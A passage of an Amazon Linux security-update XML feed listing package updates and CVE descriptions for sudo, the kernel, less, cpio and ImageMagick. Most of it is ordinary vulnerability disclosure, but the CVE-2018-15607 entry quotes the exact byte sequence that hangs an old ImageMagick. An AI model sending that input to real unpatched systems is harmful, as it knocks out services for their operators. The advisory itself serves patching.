version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package 
name="php72-xmlrpc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.i686.rpm</filename></package><package 
name="php72-odbc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1922</id><title>Amazon Linux AMI 
2014.03 - ALAS-2024-1922: important priority package update for sudo</title><issued date="2024-02-23 00:25:00" /><updated date="2024-06-07 05:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-31969:
In sudo-1.8.23-10.amzn2.3.6 (Amazon Linux 2) and sudo-1.8.23-10.58.amzn1 (Amazon Linux 1), a user with an entry in the sudoers file, enabling them to run commands as another unprivileged user, can leverage it to run commands as root. No prior versions are affected. This issue has been fixed in sudo-1.8.23-10.amzn2.3.7 (AL2) and sudo-1.8.23-10.59.amzn1 (AL1).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31969" title="" id="CVE-2024-31969" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-10.59.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-10.59.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-10.59.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-10.59.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.23" release="10.59.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-10.59.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.59.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-10.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1923</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1923: important priority package update for kernel</title><issued date="2024-02-28 23:54:00" /><updated date="2024-03-04 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-23849:
In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.
CVE-2023-6270:
A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial of service condition or potential code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6270" title="" id="CVE-2023-6270" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23849" title="" id="CVE-2024-23849" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-180.562.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="180.562.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-180.562.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="180.562.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-180.562.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1924</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1924: important priority package update for less</title><issued date="2024-02-28 23:54:00" /><updated date="2024-03-04 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48624:
close_altfile in filename.c in less before 606 omits shell_quote calls for LESSCLOSE.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48624" title="" id="CVE-2022-48624" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="less-debuginfo" version="436" release="13.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-debuginfo-436-13.13.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/less-436-13.13.amzn1.x86_64.rpm</filename></package><package name="less" version="436" release="13.13.amzn1" epoch="0" arch="i686"><filename>Packages/less-436-13.13.amzn1.i686.rpm</filename></package><package name="less-debuginfo" version="436" release="13.13.amzn1" epoch="0" arch="i686"><filename>Packages/less-debuginfo-436-13.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1925</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1925: important priority package update for cpio</title><issued date="2024-02-28 23:54:00" /><updated date="2024-03-04 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1197:
cpio 2.11, when using the --no-absolute-filenames option, allows local users to write to arbitrary files via a symlink attack on a file in an archive.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1197" title="" id="CVE-2015-1197" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cpio" version="2.10" release="12.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/cpio-2.10-12.13.amzn1.x86_64.rpm</filename></package><package name="cpio-debuginfo" version="2.10" release="12.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/cpio-debuginfo-2.10-12.13.amzn1.x86_64.rpm</filename></package><package name="cpio" version="2.10" release="12.13.amzn1" epoch="0" arch="i686"><filename>Packages/cpio-2.10-12.13.amzn1.i686.rpm</filename></package><package name="cpio-debuginfo" version="2.10" release="12.13.amzn1" epoch="0" arch="i686"><filename>Packages/cpio-debuginfo-2.10-12.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1926</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1926: important priority package update for ImageMagick</title><issued date="2024-03-13 19:46:00" /><updated date="2024-03-19 15:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code onto the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial of service (application crash resulting from an out-of-bounds read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in function MogrifyImageList() when some error conditions are met, or the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a height of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood due to a width of zero mishandle error. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a Denial of Service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in animate.c file. An array of strings, named filelist, is allocated on the heap but not released in case the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-13139:
In ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1, the ReadOneMNGImage function in coders/png.c has an out-of-bounds read with the MNG CLIP chunk.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
CVE-2016-5841:
Integer overflow in MagickCore/profile.c in ImageMagick before 7.0.2-1 allows remote attackers to cause a denial of service (segmentation fault) or possibly execute arbitrary code via vectors involving the offset variable.
